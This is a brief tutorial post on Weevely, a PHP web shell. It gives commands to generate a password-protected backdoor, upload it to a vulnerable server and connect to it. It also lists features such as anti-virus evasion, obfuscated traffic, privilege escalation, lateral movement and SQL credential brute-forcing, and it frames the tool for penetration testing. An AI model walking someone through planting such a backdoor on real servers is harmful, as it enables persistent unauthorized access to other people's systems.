Weevely is a stealthy and tiny command line web shell that stimulate terminal like connection. It is designed for remote server administration and penetration testing. This shell is useful for web application post exploitation. Once you put the shell via upload file functionality you can maintain the access to that, particularly vulnerable server. Firstly clone the source from its official repository. You have to install the required dependencies if you’re using kali linux.
git clone https://github.com/epinna/weevely3
To generate the backdoor
- pip freeze > requirement.txt
- pip install -r requirement.txt
- python weevely.py generate [PASSWORD] [FILE PATH.php]
- Upload the file to the vulnerable server.
- Record the path where the backdoor is stored.
- python weevely.py xyz.com/images/[FILE] [PASSWORD]
Voila you’ve gained the shell
Some features of this backdoor are given below
- ssh-like terminal
- Check PHP security configurations
- Execute system shell
- Mostly bypass Anti-virus
- Mount the remote file system (Httpfs)
- Network scan
- File operations
- Install remote PHP proxy (Proxy whole traffic from URL)
- Meterpreter support
- Host security auditing
- Brute-force SQL credentials
The remote agent is a small PHP script which can extend its functionality over the network at run-time. The code is polymorphic and hardly detectable by AV and the traffic is obfuscated within the HTTP requests. Weevely also provides Python API to develop your own module to implement internal audit, account enumerator, network scanner. It includes more than 30 modules for administration and maintenance needs, as well as privilege escalation and even network lateral movement. Below is a demo of post exploitation.